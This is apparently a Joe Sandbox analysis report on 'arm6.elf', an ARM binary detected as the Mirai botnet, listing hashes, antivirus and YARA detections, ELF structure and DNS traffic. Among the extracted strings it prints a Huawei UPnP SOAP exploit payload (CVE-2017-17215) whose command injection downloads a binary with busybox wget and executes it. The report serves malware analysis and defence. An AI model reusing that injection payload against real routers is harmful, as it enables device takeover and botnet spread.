Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
arm6.elf

Overview

General Information

Sample name:arm6.elf
Analysis ID:1524323
MD5:a6135718974efa6331a3e8cd1c6ce55a
SHA1:3ec9417f80d770fbd235bd623d124ca4f78b2b9c
SHA256:53387271b6d33d927f12d1c1d93a979b480d9a436b41804ee2fcfbe2518013fb
Tags:404CVE-2017-17215elfMiraiuser-NDA0E
Infos:

Detection

Mirai
Score:72
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected Mirai
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

General Information

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1524323
Start date and time:2024-10-02 18:23:54 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 23s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm6.elf
Detection:MAL
Classification:mal72.troj.linELF@0/0@2/0

Warnings

  • VT rate limit hit for: arm6.elf

Runtime Messages

Command:/tmp/arm6.elf
PID:5412
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

  • system is lnxubuntu20
  • arm6.elf (PID: 5412, Parent: 5339, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.elf
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
arm6.elfJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    arm6.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      5412.1.00007fc244017000.00007fc24402c000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5412.1.00007fc244017000.00007fc24402c000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Process Memory Space: arm6.elf PID: 5412JoeSecurity_Mirai_6Yara detected MiraiJoe Security

            Suricata Signatures

            No Suricata rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: arm6.elfAvira: detected
            Multi AV Scanner detection for submitted file
            Source: arm6.elfReversingLabs: Detection: 68%
            Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
            Source: arm6.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: arm6.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g
            Source: Initial sampleString containing 'busybox' found: -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: Initial sampleString containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: classification engineClassification label: mal72.troj.linELF@0/0@2/0
            Source: /tmp/arm6.elf (PID: 5412)Queries kernel information via 'uname': Jump to behavior
            Source: arm6.elf, 5412.1.0000559776bc6000.0000559776cf4000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
            Source: arm6.elf, 5412.1.0000559776bc6000.0000559776cf4000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
            Source: arm6.elf, 5412.1.00007ffc3a505000.00007ffc3a526000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: arm6.elf, 5412.1.00007ffc3a505000.00007ffc3a526000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf
            Source: arm6.elf, 5412.1.00007ffc3a505000.00007ffc3a526000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped

            Stealing of Sensitive Information

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: arm6.elf, type: SAMPLE
            Source: Yara matchFile source: 5412.1.00007fc244017000.00007fc24402c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: arm6.elf PID: 5412, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Mirai
            Source: Yara matchFile source: arm6.elf, type: SAMPLE
            Source: Yara matchFile source: 5412.1.00007fc244017000.00007fc24402c000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: arm6.elf PID: 5412, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath InterceptionDirect Volume AccessOS Credential Dumping11
            Security Software Discovery            		Remote ServicesData from Local System1
            Non-Application Layer Protocol            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
            Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service

            Malware Configuration

            No configs have been found

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            arm6.elf68%ReversingLabsLinux.Trojan.Mirai
            arm6.elf100%AviraEXP/ELF.Mirai.Hua.c

            Dropped Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
            http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            daisy.ubuntu.com
            		162.213.35.24
            		truefalse
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://schemas.xmlsoap.org/soap/encoding/arm6.elffalse
              • URL Reputation: safe
              		unknown
              http://schemas.xmlsoap.org/soap/envelope/arm6.elffalse
              • URL Reputation: safe
              		unknown

              World Map of Contacted IPs

              No contacted IP infos

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              daisy.ubuntu.comgmpsl.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              mips.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              mpsl.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              ppc.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.25
              novo.arm6.elfGet hashmaliciousMirai, MoobotBrowse
              • 162.213.35.25
              x86.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              x86_64.elfGet hashmaliciousMiraiBrowse
              • 162.213.35.24
              SecuriteInfo.com.Linux.Siggen.9999.20057.29261.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              SecuriteInfo.com.Linux.Siggen.9999.20205.26980.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.25
              SecuriteInfo.com.Linux.Siggen.9999.3023.13921.elfGet hashmaliciousUnknownBrowse
              • 162.213.35.24

              ASNs

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              No created / dropped files found

              Static File Info

              General

              File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
              Entropy (8bit):6.1505283061241816
              TrID:
              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
              File name:arm6.elf
              File size:83'832 bytes
              MD5:a6135718974efa6331a3e8cd1c6ce55a
              SHA1:3ec9417f80d770fbd235bd623d124ca4f78b2b9c
              SHA256:53387271b6d33d927f12d1c1d93a979b480d9a436b41804ee2fcfbe2518013fb
              SHA512:e7d313842a538412be8d41d343cb0a70b979f3eec7b820d5c6a94f089b0dff3e1b5a47cb341f5d0f17cba3bbd9e947fc24df70141f09c5aa2f6cd70a645b384e
              SSDEEP:1536:V0nEwp9zFHuSI5ArSdGKUmw1a1YtkvQPMOiO8GfwsIf7525LYd/Y:05uSIimdUmw1a1O8GfwsIf12hgw
              TLSH:BD832A55B8819B11D5D112BAFE1E118E33131B7CE3DFB3129D20AF24778A96B0E3B916
              File Content Preview:.ELF..............(.....T...4....E......4. ...(......................B...B.............. B.. B...B..................Q.td..................................-...L..................@-.,@...0....S..... 0....S.........../..0...0...@..../.$E.......B....-.@0....S

              Static ELF Info

              ELF header

              Class:ELF32
              Data:2's complement, little endian
              Version:1 (current)
              Machine:ARM
              Version Number:0x1
              Type:EXEC (Executable file)
              OS/ABI:UNIX - System V
              ABI Version:0
              Entry Point Address:0x8154
              Flags:0x4000002
              ELF Header Size:52
              Program Header Offset:52
              Program Header Size:32
              Number of Program Headers:3
              Section Header Offset:83352
              Section Header Size:40
              Number of Section Headers:12
              Header String Table Index:11

              Sections

              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
              NULL0x00x00x00x00x0000
              .initPROGBITS0x80940x940x100x00x6AX004
              .textPROGBITS0x80b00xb00x1265c0x00x6AX0016
              .finiPROGBITS0x1a70c0x1270c0x100x00x6AX004
              .rodataPROGBITS0x1a7200x127200x1afc0x00x2A008
              .init_arrayINIT_ARRAY0x242200x142240x40x00x3WA004
              .fini_arrayFINI_ARRAY0x242240x142280x40x00x3WA004
              .gotPROGBITS0x2422c0x142300x740x40x3WA004
              .dataPROGBITS0x242a00x142a40x2840x00x3WA004
              .bssNOBITS0x245240x145280x53c40x00x3WA004
              .ARM.attributesARM_ATTRIBUTES0x00x145280x100x00x0001
              .shstrtabSTRTAB0x00x145380x5d0x00x0001

              Program Segments

              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
              LOAD0x00x80000x80000x1421c0x1421c6.16980x5R E0x8000.init .text .fini .rodata
              LOAD0x142200x242200x2421c0x3080xd6c83.84930x6RW 0x8000.init_array .fini_array .got .data .bss
              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

              Network Behavior

              Network Port Distribution

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Oct 2, 2024 18:24:45.271997929 CEST4470353192.168.2.138.8.8.8
              Oct 2, 2024 18:24:45.272047997 CEST4693553192.168.2.138.8.8.8
              Oct 2, 2024 18:24:45.280213118 CEST53469358.8.8.8192.168.2.13
              Oct 2, 2024 18:24:45.280240059 CEST53447038.8.8.8192.168.2.13

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Oct 2, 2024 18:24:45.271997929 CEST192.168.2.138.8.8.80x5b67Standard query (0)daisy.ubuntu.comA (IP address)IN (0x0001)false
              Oct 2, 2024 18:24:45.272047997 CEST192.168.2.138.8.8.80xab83Standard query (0)daisy.ubuntu.com28IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Oct 2, 2024 18:24:45.280240059 CEST8.8.8.8192.168.2.130x5b67No error (0)daisy.ubuntu.com162.213.35.24A (IP address)IN (0x0001)false
              Oct 2, 2024 18:24:45.280240059 CEST8.8.8.8192.168.2.130x5b67No error (0)daisy.ubuntu.com162.213.35.25A (IP address)IN (0x0001)false

              System Behavior

              General

              Start time (UTC):16:24:43
              Start date (UTC):02/10/2024
              Path:/tmp/arm6.elf
              Arguments:/tmp/arm6.elf
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

              Chronological Activities